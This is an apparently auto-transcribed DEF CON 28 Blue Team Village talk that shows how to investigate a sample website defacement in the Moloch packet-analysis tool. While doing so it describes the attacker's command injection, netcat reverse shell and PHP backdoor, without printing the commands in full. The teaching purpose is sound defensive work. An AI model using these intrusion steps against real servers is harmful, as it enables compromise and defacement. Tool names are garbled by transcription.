 Welcome back everybody to DEF CON 28 safe mode. Continuing on with the Blue Team Village Open Sock CTF walk-through, we're going to be talking about MOLLEC today, and we have Bashar Shama here to give us a quick discussion and a walk-through on the tool and welcome Bashar. Thank you. Hello, everyone. I am Bashar and I'm going to go over how we're going to use MOLLEC tomorrow during the CTF. It was actually introduced to MOLLEC two years ago, playing the same exact CTF that you're going to play tomorrow. I played it two years ago and I really, really fall in love with MOLLEC. So, since then, I started playing with it, stringing with it, just use it as much as I can, and I can use it to today. The goal today is to really prepare you on how to use MOLLEC on the CTF tomorrow. So, we will have time for questions at the end. Please post any questions that you have to the TextWorkshops Track 1 channel in the Discord. The moderators will monitor your questions and what kind of asking at the end towards the end of the session. So, keep your questions from away. We'll have some time at the end to go over some questions. So, let's go ahead and get started. So, a very brief intro on what MOLLEC is. It's a pretty much a free open source tool. It's really a network analysis tool that you can use to analyze a large volume of packet data or PICAPs. If you want to, the simplest way to think about it is, if you've ever used Wireshark, it's like a Wireshark front end with a huge database back end. So, you can search tons and tons of PICAP data, gigs of it, hundreds of gigs of PICAPs very easily, very quickly. That's a very, very, very 10,000 over, 10,000 PICAPs overview of MOLLEC. For our purpose here and for the CTF tomorrow, what I have done is actually I have MOLLEC set up and I got some about four gigs of data as a sample from the network forensic training of first 2015. I know of these PICAPs and I pretty much loaded them into MOLLEC to kind of show you how we can use this tool to do our investigation and answer the questions during the CTF tomorrow. So, our scenario for today is, and you got your part of the security team and you received a call saying, hey, around 1 p.m. today, or not today, 1 p.m. on March 12th, 2015, our main company site has been defaced. Somebody has changed the way our website looks like. All we know is we have this image of a file shown as a frog on our main site and we don't know how this happens. Can you please help us? And all you know is you have access to packet capture. You have packet capture and that's what you do and you have our system MOLLEC. So, let's walk right towards it. So, if you have never seen MOLLEC before, this is what it looks like. This is when you land or you log in, you will land pretty much in the sessions tab and that's where you're gonna probably spend most of your time tomorrow in the sessions tab. Usually, I would like to go and just do drop down here on the time and the date and I will do all the time, all day just to have an understanding of helping the incidents. For the purpose of tomorrow again, it's gonna be a very specific time period. But this is where I would start and let's go ahead and deep dive into the investigation and how can we use MOLLEC? So, the first piece of information we know is the date of the incident. So, we know it's on 2015. So, as you can see, MOLLEC can give us this ability to just click through and decide on the dates that we wanna investigate. I'm gonna do 12. So, we have our dates here. That's gonna be our starting date. And then I'm gonna just copy it, paste it here and I'm gonna change this to 13, which will show us here now. Oh, you're looking at one day time range. So, I have my time range set up. I'm gonna go search. And now I can narrow it down to that 24 hours period to kind of figure out what happened during that day. Now, the other piece of information that we were given was it was our main company's website. So, how can I search for that? Probably I wanna look for our host name. So, what I can do is I can type host and the MOLLEC would automatically parse the different fields based on the protocols that exist in the packet. So, if it was HTTP traffic, then MOLLEC will say, okay, well, this is a HTTP hosting. If it's an email and it's an email host name and so on. In my case, because I wanna see everything, all cannot host me, I can just say host and to specify what I'm looking for in MOLLEC, I would just say equal, equal. So, equal, equal means show me everything that matches exactly our host name on AD.asee, okay? That's the first bit of it and I can run that. I also know, since it's our website, I wanna say, well, it's a website that's gonna wanna run on two ports, for example. So, to kind of add more queries into MOLLEC, what you need to do is you just do just two amp signs as an amp and I'm gonna open parentheses and add the ports that we need. So, port equals AD, just like we did before, and port, equal, 443, which we know they both are HSP ports. Now, before we go any further, under ports I can say, well, I can specify I want it to be a destination port, I can't be a source port or so on. For, just to keep it general and we can see everything here, I'm just gonna say, okay, these ports, this host name, and let's see what we find. And I'm gonna stop something, of course. Oh, I'm saying and here and that should be or. So, it's either port 80 or port 443. And that, cool, and so in that case, I just do two pipelines and run that pipes. And now I'm saying, okay, show me everything before this host on port 80 and port 44. And now I can see the traffic. So, let's go and dive deeper. On this traffic, I can see all kind of requests and let's just open something very randomly. Let's open up this request and I see it's a get request. And before we go down, let's spend some time here. So, I just see Molek where we'll parse all the fields in the packet. So, I can click on any of these and I can say, okay, well, what protocol did it come from? Which IP, which ports as HTTP packet, then it will also parse the method, the status code, all of these things to also parse the user agents. Let's say I'm interested in knowing all the user agents that happened in that specific day, that visited our website. I can easily click on user agents and I can say, okay, export unique user agents with accounts. Once I click that, I will see new page showing me the unique user agents, although at home many times, we've seen this in that specific day, and the other one. So, we only see two different user agents, nothing abnormal, nothing suspicious. So, nothing to worry about here. We scroll a bit now, and we can actually see the actual request in raw, the raw request. So, I can see which host they're requesting, whether they, the URI they're going after, and so on. Because I know we had an incident and I know the website has been defaced, the attacker must have sent some kind of data to our website. So, most likely they will not be doing a Git request. When we see Git, it's just pulling data from our website. They're gonna be posting or sending some kind of data. So, let's exclude this. So, I'm gonna click Git, and we don't want Git anymore. So, let's say not Git, but it might actually add that to our query. And it says search, see what we find. So, now we went down to only 12 entries. Okay, that's much easier to kind of go through and like investigate. Again, we're not sure what happened, but one thing I can search source for is by time to kind of understand the timeline of these different requests and the events. And this just opens under random. So, again, same kind of feels like it's parts and so on this work of the request. So, now it's a post request and it's just a question index.php. And I see a test and sleep. I'm not sure what this all this stuff really means. And I also see this jump rich stuff. What is this like, I don't understand. So, if you look at the header, which more I've already explained for you, sometimes it's actually encoded with gzip. Gzip is just a method of compression that web browsers use to compress the data to transfer the least amount of traffic. So, the nice thing with Molek, what we can do is I can just click on compress and now it automatically will decode this packet for us. And now I can easily read it and see, oh, okay. This is what loaded. This is what the page is showing. And from what we see here, nothing of interest yet. Okay, that was useful. But let's keep going. Let's find out what happened. So, another request and see this, but this is like, this looks like an IP address. But what is all this? I don't know. Well, what we can do is Molek has Cybershift built in. Well, Cybershift is a separate open source project but that we can actually just go and do Cybershift and you can load it outside of Cybershift. There we go. And you can just load it outside of Molek and you can do your decoding. But let's get back here. The beauty of this is when we do it for Molek, it will automatically take the packet data and put it in for us. So, what is Cybershift? It's pretty much a tool, a web GUI that you can use to do different decoding of different languages, decoding mechanisms and so on. So, in this case, it's taking the hex code and just decoding it. And while we're looking at this, I can see these percentage signs. Percentage sign means it's a URL kind of thing. So, I can easily just drag the old decode and now I can see the decoded message here. And I can see, oh, it's trying to ping this IP address which is the same IP that's trying to visit. Okay, this is interesting. I'm not sure if they were actually able to ping, but it looks like this IP is trying to do something here. Let's keep going, see what else can we find. Next packet, same thing, test. Okay, nothing here. Next packet, so on. Oh, there's an NC. Okay, what is this for a second? Let's put it up again, Cybershift. Do the same method, decode the URL. And now we see an NC IP address in port. So NC stands for Netcat, which is the utility attackers can use to have a server connect back to them and get shown the box. So what this is saying is, okay, connect back to my IP over this port. So what this means, if this actually succeeded, that means our server connected back on this IP address. Okay, well, let's see if this actually happened. I'm gonna take that port, I'm gonna clean all this up, and then I'm gonna add the IP address. It's not gonna be the source. And port equals the port that we're looking for, the search port. And we have traffic, uh-oh, this is not good. Looks like our box, which is the source here connected back to the server over this port. We can see how many packets and the amount of data that was sent back and forth. So immediately I would say, okay, well, this is the first connection that has the highest number of packets that might have something interesting in it. So let me open it up, scroll down, and we can actually see the whole conversation back and forth now. Well, it looks like the attacker ran a command, which is ID, which is equal to who am I on Windows, to figure out who the attacker is running as on this box and they run as Apache. Then they try to figure out which folder they're in and they try to access file systems. Okay, this is not good. And then I did this cat index PHP, which is, looks like it's our website. There's other looking into what's inside our main file and so on and, okay, what is all this? Oh, and then I see another met cat command here and saving the connection as a cm0 PHP file. And our box locally. So I really, I'm interested to know what this is, but let's keep going. Let's see what all they did they do in this box. And if we get here, they actually did it for us. They did a cat on this file that they created. Okay, when they did that, we can see, oh, it's a PHP backdoor. This is not good. So they use the PHP backdoor or our site. So how am I gonna now figure out what did they do? I know because our backdoors work, they have to visit this PHP file explicitly to kind of load the command they wanna run. So what I can say to Molek is, well, show me all the URIs. So when we say a URI is pretty much everything after the domain would be a URI, that's what it's in front here on. That's a URI. So I wanna say, show me everything that has this in it. And since I can't just do like all what I do in Molek is I just use wildcards at the beginning. So I don't care what's before this and the end meaning I don't care what's after it. Just show me anything that this has this string in the URI. And when I search it, now here, we can see all these URIs for URIs with all these different links in them. What's that they're trying to do? Well, how can I know like, how can I get all this put in like one nice place? I can just click in above and I wanna say export unique URI with accounts. Now Molek will take this for us and tell us, okay, well, this command was run five times. This command was run three times and so on. So now I kind of know which commands they ran because I can see it's to command people cat, command people cat or else or whatever they're trying to do. And I kind of see here there's a JPEG file as well. Okay. So this is how they probably got that JPEG file or the image of the fraud or websites. So let's find out where did they like, how did they do this? So back here and let's do, instead of this, we are looking for that specific JPEG file. So I'm gonna do wildcard and show me anything that has JPEG in it. Go to it up and it's gonna show me all the stuff. I'm gonna say probably it's gonna be the biggest file. So I'm gonna sort by the size of the data and this is the biggest file that we have when it's loading. And here I can see it's an image file and but I'm not sure what it looks like. So what I can do in Molek is I can just click on show images and files and it will actually render it for us right here in the browser. Now, let's say, you know, I'm not comfortable with doing this or I want to dig in deeper to it or I want to understand what actually happens using Wireshark because I've never used Molek before. At any session, at any point, you can always just click on double pick up and it will kind of like save the pick up for you. So you can open up in Wireshark and, you know, do your analysis manually if you'd like to. Pretty much that's how they get the file and that's how they deface our website and it was in a back door. If we have time, I think we have another, I think that's pretty much it. Okay, so would that be insane? I think that's the highlight of Molek and how to use it. I want to keep some time for questions. Please let me know what kind of questions you've got. I'm also going to be in Discord, be on Twitter if you need anything else but I'm going to be here for any questions that you guys have. Thank you, Bashar. I went ahead and put a note in the text window under the Workshop Track 1 with a link over to Reconnaissance X, Open Sock, Molek Discord Channel. So definitely check that out. Obviously hit Bashar up on Twitter Discord but we're trying to help everybody kind of connect with the right people here so you can get the help you need. Perfect. Thanks a lot, Bashar. I appreciate it. Thank you. I appreciate it. Thank you. Take care.